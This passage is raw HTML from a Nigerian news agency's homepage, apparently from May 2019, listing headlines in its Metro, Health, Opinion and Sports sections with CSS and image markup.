content="https://s18694.pcdn.co/wp-content/uploads/2019/03/Facebook-270x180.jpg"> </div> </div> </div> </li> </ul> </div> </div> </div></div></div></div> </div> </div> <div class="vc_col-sm-3 vc_hidden-sm vc_hidden-xs wpb_column vc_column_container"> <div class="wpb_wrapper"> <div class="vc_widget xt_news widget wpb_content_element check_cache" data-cache_enabled="0" data-flush_cache="0"> <style id="xtwidgetff7406ffdaae61b8e3b99d46b0ba3d90_style" class="widget-instance-style" scoped> #xtwidgetff7406ffdaae61b8e3b99d46b0ba3d90 .xt-post-title,#xtwidgetff7406ffdaae61b8e3b99d46b0ba3d90 .xt-post-title > a{font-size:15px;line-height:19px;}#xtwidgetff7406ffdaae61b8e3b99d46b0ba3d90 .xt-post-title.featured,#xtwidgetff7406ffdaae61b8e3b99d46b0ba3d90 .xt-post-title.featured > a{font-size:18px;line-height:22px;font-weight:400;}#xtwidgetff7406ffdaae61b8e3b99d46b0ba3d90 .xt-post-excerpt.featured{font-weight:600;}@media only screen and (max-width:849px){#xtwidgetff7406ffdaae61b8e3b99d46b0ba3d90 .xt-post-title,#xtwidgetff7406ffdaae61b8e3b99d46b0ba3d90 .xt-post-title > a{font-size:15px!important;}}@media only screen and (max-width:849px){#xtwidgetff7406ffdaae61b8e3b99d46b0ba3d90 .xt-post-title.featured,#xtwidgetff7406ffdaae61b8e3b99d46b0ba3d90 .xt-post-title.featured > a{font-size:18px!important;}} </style><div id="xtwidgetff7406ffdaae61b8e3b99d46b0ba3d90" class="widget xt_news "><div class="xt-widget-wrap"><div class="xt-widget-header clearfix"><h3 class="widgettitle">Metro </h3></div><div class="xt-widget-content xt-widget-has-header clearfix"> <div class="row collapse"> <div class="medium-12 column"> <ul class="news-list featured-posts-1-col xt-ajax-wrap list" > <li itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="row collapse "> <div class="medium-12 in_widget column"> <a target="_self" class="th post-thumbnail" href="https://www.nan.ng/news/hamzat-lagos-deputy-governor-elect-loses-father/"> <img width="270" height="180" src="https://s18694.pcdn.co/wp-content/uploads/2019/05/Oba-Mufutau-Hamzat-270x180.jpg" class="attachment-xt-medium wp-post-image" alt="" itemprop="image" srcset="https://s18694.pcdn.co/wp-content/uploads/2019/05/Oba-Mufutau-Hamzat-270x180.jpg 270w, https://s18694.pcdn.co/wp-content/uploads/2019/05/Oba-Mufutau-Hamzat-165x110.jpg 165w, https://s18694.pcdn.co/wp-content/uploads/2019/05/Oba-Mufutau-Hamzat-480x320.jpg 480w" sizes="(max-width: 270px) 100vw, 270px" /> <div class="icon-overlay"><span class="fa fa fa fa-no-icon"></span></div> </a> </div> <div class="medium-12 in_widget column "> <div class="meta default-meta"> <h4 class="bold featured xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="Hamzat, Lagos deputy-governor elect loses father" target="_self" href="https://www.nan.ng/news/hamzat-lagos-deputy-governor-elect-loses-father/">Hamzat, Lagos deputy-governor elect loses father</a> </h4> <meta itemprop="datePublished" content="2019-05-13T03:47:38+01:00"> <meta itemprop="dateModified" content="2019-05-13T03:47:38+01:00"> </div> </div> </div> </li> <li itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="row collapse "> <div class="medium-12 in_widget column "> <div class="meta default-meta"> <h4 class=" xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="We can&#8217;t be under Gaya Emirate, Wudil people kick" target="_self" href="https://www.nan.ng/news/we-cant-be-under-gaya-emirate-wudil-people-kick/">We can&#8217;t be under Gaya Emirate, Wudil people kick</a> </h4> <meta itemprop="datePublished" content="2019-05-12T22:12:19+01:00"> <meta itemprop="dateModified" content="2019-05-12T22:12:19+01:00"> <meta itemprop="image" content="https://s18694.pcdn.co/wp-content/uploads/2019/03/Abdullahi-Ganduje-savours-hard-won-victory-in-Kano-270x180.jpg"> </div> </div> </div> </li> <li itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="row collapse "> <div class="medium-12 in_widget column "> <div class="meta default-meta"> <h4 class=" xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="Court order on new Kano emirs belated : Kano govt" target="_self" href="https://www.nan.ng/news/court-order-on-new-kano-emirs-belated-kano-govt/">Court order on new Kano emirs belated : Kano govt</a> </h4> <meta itemprop="datePublished" content="2019-05-11T15:04:22+01:00"> <meta itemprop="dateModified" content="2019-05-11T15:04:22+01:00"> <meta itemprop="image" content="https://s18694.pcdn.co/wp-content/uploads/2019/05/Aminu-Bayero-270x180.jpg"> </div> </div> </div> </li> </ul> </div> </div> </div></div></div></div> </div> </div> <div class="vc_col-sm-3 vc_hidden-sm vc_hidden-xs wpb_column vc_column_container"> <div class="wpb_wrapper"> <div class="vc_widget xt_news widget wpb_content_element check_cache" data-cache_enabled="0" data-flush_cache="0"> <style id="xtwidgetc9102ff94851e7899a2b7869192c211b_style" class="widget-instance-style" scoped> #xtwidgetc9102ff94851e7899a2b7869192c211b .xt-post-title,#xtwidgetc9102ff94851e7899a2b7869192c211b .xt-post-title > a{font-size:15px;line-height:19px;}#xtwidgetc9102ff94851e7899a2b7869192c211b .xt-post-title.featured,#xtwidgetc9102ff94851e7899a2b7869192c211b .xt-post-title.featured > a{font-size:18px;line-height:22px;font-weight:400;}#xtwidgetc9102ff94851e7899a2b7869192c211b .xt-post-excerpt.featured{font-weight:600;}@media only screen and (max-width:849px){#xtwidgetc9102ff94851e7899a2b7869192c211b .xt-post-title,#xtwidgetc9102ff94851e7899a2b7869192c211b .xt-post-title > a{font-size:15px!important;}}@media only screen and (max-width:849px){#xtwidgetc9102ff94851e7899a2b7869192c211b .xt-post-title.featured,#xtwidgetc9102ff94851e7899a2b7869192c211b .xt-post-title.featured > a{font-size:18px!important;}} </style><div id="xtwidgetc9102ff94851e7899a2b7869192c211b" class="widget xt_news "><div class="xt-widget-wrap"><div class="xt-widget-header clearfix"><h3 class="widgettitle">Health </h3></div><div class="xt-widget-content xt-widget-has-header clearfix"> <div class="row collapse"> <div class="medium-12 column"> <ul class="news-list featured-posts-1-col xt-ajax-wrap list" > <li itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="row collapse "> <div class="medium-12 in_widget column"> <a target="_self" class="th post-thumbnail" href="https://www.nan.ng/health/gombe-nafdac-alerts-public-on-circulation-of-fake-cold-caplets/"> <img width="270" height="180" src="https://s18694.pcdn.co/wp-content/uploads/2018/06/NAFDAC-DG-Prof.-Moji-Adeyeye--270x180.gif" class="attachment-xt-medium wp-post-image" alt="" itemprop="image" srcset="https://s18694.pcdn.co/wp-content/uploads/2018/06/NAFDAC-DG-Prof.-Moji-Adeyeye--270x180.gif 270w, https://s18694.pcdn.co/wp-content/uploads/2018/06/NAFDAC-DG-Prof.-Moji-Adeyeye--165x110.gif 165w, https://s18694.pcdn.co/wp-content/uploads/2018/06/NAFDAC-DG-Prof.-Moji-Adeyeye--480x320.gif 480w" sizes="(max-width: 270px) 100vw, 270px" /> <div class="icon-overlay"><span class="fa fa fa fa-no-icon"></span></div> </a> </div> <div class="medium-12 in_widget column "> <div class="meta default-meta"> <h4 class="bold featured xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="Gombe: NAFDAC alerts public on circulation of fake cold Caplets" target="_self" href="https://www.nan.ng/health/gombe-nafdac-alerts-public-on-circulation-of-fake-cold-caplets/">Gombe: NAFDAC alerts public on circulation of fake cold Caplets</a> </h4> <meta itemprop="datePublished" content="2019-05-16T10:11:59+01:00"> <meta itemprop="dateModified" content="2019-05-16T10:11:59+01:00"> </div> </div> </div> </li> <li itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="row collapse "> <div class="medium-12 in_widget column "> <div class="meta default-meta"> <h4 class=" xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="FG proposes 6 medical warehouses – Minister" target="_self" href="https://www.nan.ng/health/fg-proposes-6-medical-warehouses-minister/">FG proposes 6 medical warehouses – Minister</a> </h4> <meta itemprop="datePublished" content="2019-05-15T12:47:06+01:00"> <meta itemprop="dateModified" content="2019-05-15T12:47:06+01:00"> <meta itemprop="image" content="https://s18694.pcdn.co/wp-content/uploads/2017/05/Health-Minister-Prof-Adewole-Happy-with-the-development-270x180.jpg"> </div> </div> </div> </li> <li itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="row collapse "> <div class="medium-12 in_widget column "> <div class="meta default-meta"> <h4 class=" xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="Alabama senate passes law to ban abortion" target="_self" href="https://www.nan.ng/health/alabama-senate-passes-law-to-ban-abortion/">Alabama senate passes law to ban abortion</a> </h4> <meta itemprop="datePublished" content="2019-05-15T08:25:01+01:00"> <meta itemprop="dateModified" content="2019-05-15T10:06:56+01:00"> <meta itemprop="image" content="https://s18694.pcdn.co/wp-content/uploads/2018/03/ireland-on-abortion-1-270x180.jpg"> </div> </div> </div> </li> </ul> </div> </div> </div></div></div></div> </div> </div> <div class="vc_col-sm-3 vc_hidden-sm vc_hidden-xs wpb_column vc_column_container"> <div class="wpb_wrapper"> <div class="vc_widget xt_news widget wpb_content_element check_cache" data-cache_enabled="0" data-flush_cache="0"> <style id="xtwidgetf7514f4d0b1ed81d010e16257d3ffa7b_style" class="widget-instance-style" scoped> #xtwidgetf7514f4d0b1ed81d010e16257d3ffa7b .xt-post-title,#xtwidgetf7514f4d0b1ed81d010e16257d3ffa7b .xt-post-title > a{font-size:15px;line-height:19px;}#xtwidgetf7514f4d0b1ed81d010e16257d3ffa7b .xt-post-title.featured,#xtwidgetf7514f4d0b1ed81d010e16257d3ffa7b .xt-post-title.featured > a{font-size:18px;line-height:22px;font-weight:400;}#xtwidgetf7514f4d0b1ed81d010e16257d3ffa7b .xt-post-excerpt.featured{font-weight:600;}@media only screen and (max-width:849px){#xtwidgetf7514f4d0b1ed81d010e16257d3ffa7b .xt-post-title,#xtwidgetf7514f4d0b1ed81d010e16257d3ffa7b .xt-post-title > a{font-size:15px!important;}}@media only screen and (max-width:849px){#xtwidgetf7514f4d0b1ed81d010e16257d3ffa7b .xt-post-title.featured,#xtwidgetf7514f4d0b1ed81d010e16257d3ffa7b .xt-post-title.featured > a{font-size:18px!important;}} </style><div id="xtwidgetf7514f4d0b1ed81d010e16257d3ffa7b" class="widget xt_news "><div class="xt-widget-wrap"><div class="xt-widget-header clearfix"><h3 class="widgettitle">Opinion </h3></div><div class="xt-widget-content xt-widget-has-header clearfix"> <div class="row collapse"> <div class="medium-12 column"> <ul class="news-list featured-posts-1-col xt-ajax-wrap list" > <li itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="row collapse "> <div class="medium-12 in_widget column"> <a target="_self" class="th post-thumbnail" href="https://www.nan.ng/politics/buhari-why-and-how-he-won/"> <img width="270" height="180" src="https://s18694.pcdn.co/wp-content/uploads/2019/02/Buhari-Osinbajo-display-their-certificates-of-return-270x180.jpg" class="attachment-xt-medium wp-post-image" alt="Buhari, Osinbajo display their certificates of return" itemprop="image" srcset="https://s18694.pcdn.co/wp-content/uploads/2019/02/Buhari-Osinbajo-display-their-certificates-of-return-270x180.jpg 270w, https://s18694.pcdn.co/wp-content/uploads/2019/02/Buhari-Osinbajo-display-their-certificates-of-return-165x110.jpg 165w, https://s18694.pcdn.co/wp-content/uploads/2019/02/Buhari-Osinbajo-display-their-certificates-of-return-480x320.jpg 480w" sizes="(max-width: 270px) 100vw, 270px" /> <div class="icon-overlay"><span class="fa fa fa fa-no-icon"></span></div> </a> </div> <div class="medium-12 in_widget column "> <div class="meta default-meta"> <h4 class="bold featured xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="Buhari: Why and how he won" target="_self" href="https://www.nan.ng/politics/buhari-why-and-how-he-won/">Buhari: Why and how he won</a> </h4> <meta itemprop="datePublished" content="2019-05-06T03:40:10+01:00"> <meta itemprop="dateModified" content="2019-05-06T03:35:08+01:00"> </div> </div> </div> </li> <li itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="row collapse "> <div class="medium-12 in_widget column "> <div class="meta default-meta"> <h4 class=" xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="What Is Atiku’s Real Motive With Alternative Facts?" target="_self" href="https://www.nan.ng/politics/what-is-atikus-real-motive-with-alternative-facts/">What Is Atiku’s Real Motive With Alternative Facts?</a> </h4> <meta itemprop="datePublished" content="2019-05-01T08:22:42+01:00"> <meta itemprop="dateModified" content="2019-05-01T08:22:42+01:00"> <meta itemprop="image" content="https://s18694.pcdn.co/wp-content/uploads/2019/02/Atiku-in-Rivers-270x180.jpg"> </div> </div> </div> </li> <li itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="row collapse "> <div class="medium-12 in_widget column "> <div class="meta default-meta"> <h4 class=" xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="Buhari&#8217;s second term: Looking back, looking forward" target="_self" href="https://www.nan.ng/feature/buharis-second-term-looking-back-looking-forward/">Buhari&#8217;s second term: Looking back, looking forward</a> </h4> <meta itemprop="datePublished" content="2019-04-20T11:32:49+01:00"> <meta itemprop="dateModified" content="2019-04-20T11:32:49+01:00"> <meta itemprop="image" content="https://s18694.pcdn.co/wp-content/uploads/2019/02/9B2596D5-9940-4273-94C3-04D7464C661F-270x180.jpeg"> </div> </div> </div> </li> </ul> </div> </div> </div></div></div></div> </div> </div> </div><div class="vc_row wpb_row full-width"> <div class="vc_col-sm-12 vc_hidden-sm vc_hidden-xs wpb_column vc_column_container"> <div class="wpb_wrapper"> <div class="vc_separator wpb_content_element vc_separator_align_center vc_sep_width_100 vc_sep_pos_align_center vc_separator_no_text vc_sep_color_grey" ><span class="vc_sep_holder vc_sep_holder_l"><span class="vc_sep_line"></span></span><span class="vc_sep_holder vc_sep_holder_r"><span class="vc_sep_line"></span></span> </div> </div> </div> </div><div class="vc_row wpb_row in-container"> <div class="vc_col-sm-8 vc_hidden-sm vc_hidden-xs wpb_column vc_column_container vc_custom_1470418134805"> <div class="wpb_wrapper"> <div class="vc_row wpb_row vc_inner in-container"> <div class="vc_col-sm-12 latest-list wpb_column vc_column_container vc_custom_1469713274519"> <div class="wpb_wrapper"> <div class="vc_widget xt_news widget wpb_content_element check_cache" data-cache_enabled="0" data-flush_cache="0"> <style id="xtwidgetcee056496df036380f9a688106958880_style" class="widget-instance-style" scoped> #xtwidgetcee056496df036380f9a688106958880 .xt-post-title,#xtwidgetcee056496df036380f9a688106958880 .xt-post-title > a{font-size:16px;line-height:20px;}#xtwidgetcee056496df036380f9a688106958880 .xt-post-title:not(.bold),#xtwidgetcee056496df036380f9a688106958880 .xt-post-title:not(.bold) > a{font-weight:400;}#xtwidgetcee056496df036380f9a688106958880 .xt-post-title.featured,#xtwidgetcee056496df036380f9a688106958880 .xt-post-title.featured > a{font-size:30px;line-height:34px;font-weight:400;}@media only screen and (max-width:849px){#xtwidgetcee056496df036380f9a688106958880 .xt-post-title,#xtwidgetcee056496df036380f9a688106958880 .xt-post-title > a{font-size:16px!important;}}@media only screen and (max-width:849px){#xtwidgetcee056496df036380f9a688106958880 .xt-post-title.featured,#xtwidgetcee056496df036380f9a688106958880 .xt-post-title.featured > a{font-size:27px!important;line-height:1.3!important;}} </style><div id="xtwidgetcee056496df036380f9a688106958880" class="widget xt_news "><div class="xt-widget-wrap"><div class="xt-widget-header clearfix"><h3 class="widgettitle">Sports </h3></div><div class="xt-widget-content xt-widget-has-header clearfix"> <div class="row collapse"> <ul class="news-list xt-ajax-wrap featured-posts-2-col-style-3 list" > <li class="medium-8 column first"> <div class="row collapse " itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="medium-12 column"> <a target="_self" class="th post-thumbnail" href="https://www.nan.ng/football-sports/rangers-tighten-grip-on-npfl-group-with-defeat-of-bendel-insurance/"> <img itemprop="image" alt="Rangers-players-celebrate-CAF-Conf.-group-match-win-490x380.jpg" src="https://s18694.pcdn.co/wp-content/uploads/2019/02/Rangers-players-celebrate-CAF-Conf.-group-match-win-490x380.jpg" width="490" height="380" class="wp-post-image wp-featured-image"> <div class="icon-overlay"><span class="fa fa fa fa-no-icon"></span></div> </a> </div> <div class="medium-12 column "> <div class="meta default-meta"> <h2 class="featured xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="Rangers tighten grip on NPFL group with defeat of Bendel Insurance" target="_self" href="https://www.nan.ng/football-sports/rangers-tighten-grip-on-npfl-group-with-defeat-of-bendel-insurance/">Rangers tighten grip on NPFL group with defeat of Bendel Insurance</a> </h2> <meta itemprop="datePublished" content="2019-05-15T23:59:04+01:00"> <meta itemprop="dateModified" content="2019-05-15T23:59:04+01:00"> </div> </div> </div> </li> <li class="medium-4 column last no-border"> <div class="row collapse " itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="small-12 column"> <a target="_self" class="th post-thumbnail" href="https://www.nan.ng/sports/griezmann-quits-atletico-madrid/"> <img itemprop="image" alt="Antonio-Griezmann-e1557900971562-240x160.jpg" src="https://s18694.pcdn.co/wp-content/uploads/2019/05/Antonio-Griezmann-e1557900971562-240x160.jpg" width="240" height="160" class="wp-post-image wp-featured-image"> <div class="icon-overlay"><span class="fa fa fa fa-no-icon"></span></div> </a> </div> <div class="small-12 column"> <div class="meta default-meta"> <h5 class="bold xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="Griezmann quits Atletico Madrid" target="_self" href="https://www.nan.ng/sports/griezmann-quits-atletico-madrid/">Griezmann quits Atletico Madrid</a> </h5> <meta itemprop="datePublished" content="2019-05-15T07:18:34+01:00"> <meta itemprop="dateModified" content="2019-05-15T07:18:34+01:00"> </div> </div> </div> <div class="row collapse " itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="small-12 column"> <div class="meta default-meta side"> <h5 class=" xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="Chris Coleman sacked by China&#8217;s Hebei" target="_self" href="https://www.nan.ng/sports/chris-coleman-sacked-by-chinas-hebei/">Chris Coleman sacked by China&#8217;s Hebei</a> </h5> <meta itemprop="datePublished" content="2019-05-15T07:08:06+01:00"> <meta itemprop="dateModified" content="2019-05-15T07:08:06+01:00"> </div> </div> </div> <div class="row collapse " itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="small-12 column"> <div class="meta default-meta side"> <h5 class=" xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="Ecuador president honours Valencia of Man United" target="_self" href="https://www.nan.ng/sports/ecuador-president-honours-valencia-of-man-united/">Ecuador president honours Valencia of Man United</a> </h5> <meta itemprop="datePublished" content="2019-05-15T07:01:55+01:00"> <meta itemprop="dateModified" content="2019-05-15T07:01:55+01:00"> </div> </div> </div> <div class="row collapse no-border " itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="small-12 column"> <div class="meta default-meta side"> <h5 class=" xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="Skomina to referee UEFA Champions League final" target="_self" href="https://www.nan.ng/sports/skomina-to-referee-uefa-champions-league-final/">Skomina to referee UEFA Champions League final</a> </h5> <meta itemprop="datePublished" content="2019-05-14T21:31:08+01:00"> <meta itemprop="dateModified" content="2019-05-14T21:31:08+01:00"> </div> </div> </div> </ul> </div> </div></div></div></div><div class="vc_widget xt_news widget wpb_content_element check_cache" data-cache_enabled="0" data-flush_cache="0"> <style id="xtwidget94ea759524280470b47a479fc660f62d_style" class="widget-instance-style" scoped> #xtwidget94ea759524280470b47a479fc660f62d .xt-post-title,#xtwidget94ea759524280470b47a479fc660f62d .xt-post-title > a{font-size:16px;line-height:20px;}#xtwidget94ea759524280470b47a479fc660f62d .xt-post-title:not(.bold),#xtwidget94ea759524280470b47a479fc660f62d .xt-post-title:not(.bold) > a{font-weight:100;}@media only screen and (max-width:849px){#xtwidget94ea759524280470b47a479fc660f62d .xt-post-title,#xtwidget94ea759524280470b47a479fc660f62d .xt-post-title > a{font-size:16px!important;}} </style><div id="xtwidget94ea759524280470b47a479fc660f62d" class="widget xt_news "><div class="xt-widget-wrap"><div class="xt-widget-content clearfix"> <ul class="news-list posts-grid xt-ajax-wrap small-block-grid-1 small-grid-offset meta-category-over meta-options medium-block-grid-2 large-block-grid-3" > <li class="post-124097 post type-post status-publish format-standard has-post-thumbnail hentry category-football-sports category-sports tag-afcon-2019 tag-super-eagles-squad" itemscope="" itemtype="http://schema.org/BlogPosting" data-equalizer-watch> <div class="row collapse has-background auto-height " onclick="location.href='https://www.nan.ng/sports/mikel-obi-musa-23-others-make-super-eagles-afcon-squad/'" style=" background-image: url(https://s18694.pcdn.co/wp-content/uploads/2018/12/Super-Eagles--480x320.jpg)"> <div class="medium-12 in_widget column"> <a target="_self" class="th post-thumbnail" href="https://www.nan.ng/sports/mikel-obi-musa-23-others-make-super-eagles-afcon-squad/"> <img width="480" height="320" src="https://s18694.pcdn.co/wp-content/uploads/2018/12/Super-Eagles--480x320.jpg" class="attachment-xt-large wp-post-image" alt="Super Eagles" itemprop="image" srcset="https://s18694.pcdn.co/wp-content/uploads/2018/12/Super-Eagles--480x320.jpg 480w, https://s18694.pcdn.co/wp-content/uploads/2018/12/Super-Eagles--165x110.jpg 165w, https://s18694.pcdn.co/wp-content/uploads/2018/12/Super-Eagles--270x180.jpg 270w" sizes="(max-width: 480px) 100vw, 480px" /> </a> <div class="icon-overlay"><span class="fa fa fa-no-icon"></span></div> </div> <div class="medium-12 in_widget column meta-container"> <div class="meta"> </div> </div> </div> <div class="row collapse " itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="medium-12 in_widget column "> <div class="meta default-meta"> <h4 class="bold xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="Mikel Obi, Musa, 23 others make Super Eagles AFCON squad" target="_self" href="https://www.nan.ng/sports/mikel-obi-musa-23-others-make-super-eagles-afcon-squad/">Mikel Obi, Musa, 23 others make Super Eagles AFCON squad</a> </h4> <meta itemprop="datePublished" content="2019-05-14T20:03:21+01:00"> <meta itemprop="dateModified" content="2019-05-14T20:21:45+01:00"> </div> </div> </div> </li> <li class="post-124087 post type-post status-publish format-standard has-post-thumbnail hentry category-sports tag-italian-open tag-knee-injury tag-serena-williams tag-serena-williams-pulls-out" itemscope="" itemtype="http://schema.org/BlogPosting" data-equalizer-watch> <div class="row collapse has-background auto-height " onclick="location.href='https://www.nan.ng/sports/serena-withdraws-from-italian-open-with-knee-injury/'" style=" background-image: url(https://s18694.pcdn.co/wp-content/uploads/2018/09/98D9FCBF-BA41-4005-A0D5-612B3D020703-480x320.jpeg)"> <div class="medium-12 in_widget column"> <a target="_self" class="th post-thumbnail" href="https://www.nan.ng/sports/serena-withdraws-from-italian-open-with-knee-injury/"> <img width="480" height="320" src="https://s18694.pcdn.co/wp-content/uploads/2018/09/98D9FCBF-BA41-4005-A0D5-612B3D020703-480x320.jpeg" class="attachment-xt-large wp-post-image" alt="" itemprop="image" srcset="https://s18694.pcdn.co/wp-content/uploads/2018/09/98D9FCBF-BA41-4005-A0D5-612B3D020703-480x320.jpeg 480w, https://s18694.pcdn.co/wp-content/uploads/2018/09/98D9FCBF-BA41-4005-A0D5-612B3D020703-165x110.jpeg 165w, https://s18694.pcdn.co/wp-content/uploads/2018/09/98D9FCBF-BA41-4005-A0D5-612B3D020703-270x180.jpeg 270w" sizes="(max-width: 480px) 100vw, 480px" /> </a> <div class="icon-overlay"><span class="fa fa fa-no-icon"></span></div> </div> <div class="medium-12 in_widget column meta-container"> <div class="meta"> </div> </div> </div> <div class="row collapse " itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="medium-12 in_widget column "> <div class="meta default-meta"> <h4 class="bold xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="Serena withdraws from Italian Open with knee injury" target="_self" href="https://www.nan.ng/sports/serena-withdraws-from-italian-open-with-knee-injury/">Serena withdraws from Italian Open with knee injury</a> </h4> <meta itemprop="datePublished" content="2019-05-14T17:36:15+01:00"> <meta itemprop="dateModified" content="2019-05-14T17:36:15+01:00"> </div> </div> </div> </li> <li class="post-124067 post type-post status-publish format-standard has-post-thumbnail hentry category-football-sports category-sports tag-financial-fair-play-ffp tag-manchester-city-fc tag-uefa-champions-league" itemscope="" itemtype="http://schema.org/BlogPosting" data-equalizer-watch> <div class="row collapse has-background auto-height " onclick="location.href='https://www.nan.ng/football-sports/man-city-face-uefa-ban-to-lose-champions-league-spot/'" style=" background-image: url(https://s18694.pcdn.co/wp-content/uploads/2019/05/Man-City-players-celebrate-480x320.jpg)"> <div class="medium-12 in_widget column"> <a target="_self" class="th post-thumbnail" href="https://www.nan.ng/football-sports/man-city-face-uefa-ban-to-lose-champions-league-spot/"> <img width="480" height="320" src="https://s18694.pcdn.co/wp-content/uploads/2019/05/Man-City-players-celebrate-480x320.jpg" class="attachment-xt-large wp-post-image" alt="Man City players celebrate" itemprop="image" srcset="https://s18694.pcdn.co/wp-content/uploads/2019/05/Man-City-players-celebrate-480x320.jpg 480w, https://s18694.pcdn.co/wp-content/uploads/2019/05/Man-City-players-celebrate-165x110.jpg 165w, https://s18694.pcdn.co/wp-content/uploads/2019/05/Man-City-players-celebrate-270x180.jpg 270w" sizes="(max-width: 480px) 100vw, 480px" /> </a> <div class="icon-overlay"><span class="fa fa fa-no-icon"></span></div> </div> <div class="medium-12 in_widget column meta-container"> <div class="meta"> </div> </div> </div> <div class="row collapse " itemscope="" itemtype="http://schema.org/BlogPosting"> <div class="medium-12 in_widget column "> <div class="meta default-meta"> <h4 class="bold xt-post-title" itemprop="headline"> <a itemprop="url" rel="bookmark" title="Man City face UEFA ban, to lose Champions League spot" target="_self" href="https://www.nan.ng/football-sports/man-city-face-uefa-ban-to-lose-champions-league-spot/">Man City face UEFA ban, to lose Champions League spot</a> </h4> <meta itemprop="datePublished" content="2019-05-14T12:45:35+01:00"> <meta itemprop="dateModified" content="2019-05-14T12:45:35+01:00"> </div> </div> </div> </li> </ul> </div></div></div></div> </div> </div> </div> </div> </div> <div class="vc_col-sm-4 vc_hidden-sm vc_hidden-xs wpb_column vc_column_container vc_custom_1470418156368 has-sticky-sidebar" data-margin_top="10" data-margin_bottom="0" > <div class="sidebar vc_sidebar position-right widget-area"> <div class="wpb_wrapper"> <div class="wpb_text_column wpb_content_element " > <div class="wpb_wrapper"> <p><img src="https://s18694.pcdn.co/wp-content/uploads/2016/08/CBN.gif" /></p> </div> </div> <div class="wpb_single_image wpb_content_element vc_align_center"> <figure class="wpb_wrapper vc_figure"> <a href="https://corporate.exxonmobil.com/en" target="_self" class="vc_single_image-wrapper vc_box_border_grey"><img width="337" height="600" src="https://s18694.pcdn.co/wp-content/uploads/2017/05/NAN-337x600-ExxonMobil-Top-100.gif" class="vc_single_image-img attachment-full" alt="" /></a> </figure> </div> </div> </div> </div> </div><div class="vc_row wpb_row full-width"> <div class="vc_col-sm-12 vc_hidden-sm vc_hidden-xs wpb_column vc_column_container"> <div class="wpb_wrapper"> <div class="vc_separator wpb_content_element vc_separator_align_center vc_sep_width_100 vc_sep_pos_align_center vc_separator_no_text vc_sep_color_grey" ><span class="vc_sep_holder vc_sep_holder_l"><span class="vc_sep_line"></span></span><span class="vc_sep_holder vc_sep_holder_r"><span class="vc_sep_line"></span></span> </div> </div> </div> </div><div class="vc_row wpb_row vc_custom_1486826025817 full-width"> <div class="vc_col-sm-12 vc_hidden-lg vc_hidden-md wpb_column vc_column_container"> <div class="wpb_wrapper"> <div class="vc_separator wpb_content_element vc_separator_align_center vc_sep_width_100 vc_sep_pos_align_center vc_separator_no_text vc_sep_color_grey" ><span class="vc_sep_holder vc_sep_holder_l"><span class="vc_sep_line"></span></span><span class="vc_sep_holder vc_sep_holder_r"><span class="vc_sep_line"></span></span> </div> </div> </div> </div><div class="vc_row wpb_row full-top vc_custom_1486826456743 full-width"> <div class="vc_col-sm-12 vc_hidden-lg vc_hidden-md latest-headline wpb_column vc_column_container vc_custom_1475673458746"> <div class="wpb_wrapper"> <div class="vc_widget xt_news widget wpb_content_element check_cache" data-cache_enabled="0" data-flush_cache="0"> <style id="xtwidget36941483f7bf70e76cbadfac16ab24c2_style" class="widget-instance-style" scoped> #xtwidget36941483f7bf70e76cbadfac16ab24c2 .xt-post-title,#xtwidget36941483f7bf70e76cbadfac16ab24c2 .xt-post-title > a{font-size:24px;line-height:28px;}#xtwidget36941483f7bf70e76cbadfac16ab24c2 .xt-post-title:not(.bold),#xtwidget36941483f7bf70e76cbadfac16ab24c2 .xt-post-title:not(.bold) > a{font-weight:400;}@media only screen and (max-width:849px){#xtwidget36941483f7bf70e76cbadfac16ab24c2 .xt-post-title,#xtwidget36941483f7bf70e76cbadfac16ab24c2 .xt-post-title > a{font-size:24px!important;}} </style><div id="xtwidget36941483f7bf70e76cbadfac16ab24c2" class="widget xt_news "><div class="xt-widget-wrap"><div class="xt-widget-content clearfix"> <ul class="news-list posts-grid xt-ajax-wrap small-block-grid-1 small-grid-offset meta-category-stats-over meta-options medium-block-grid-1 large-block-grid-1" > <li class="post-124172 post type-post status-publish format-standard has-post-thumbnail hentry category-headlines category-news tag-alhaji-atiku-abubakar tag-pdp" itemscope="" itemtype="http://schema.org/BlogPosting" data-equalizer-watch> <div class="row collapse has-background custom-height " onclick="location.href='https://www.nan.ng/news/pdp-atiku-sabotaging-buharis-government/'" style="height:230px; background-image: url(https://s18694.pcdn.co/wp-content/uploads/2019/02/Atiku-in-Rivers.jpg)"> <div class="medium-12 in_widget column"> <a target="_self" class="th post-thumbnail" href="https://www.nan.ng/news/pdp-atiku-sabotaging-buharis-government/"> <img itemprop="image" alt="Atiku-in-Rivers.jpg" src="https://s18694.pcdn.co/wp-content/uploads/2019/02/Atiku-in-Rivers.jpg" width="0" height="0" class="wp-post-image wp-featured-image"> </a> <div class="icon-overlay"><span class="fa fa fa-no-icon"></span></div> </div> <div 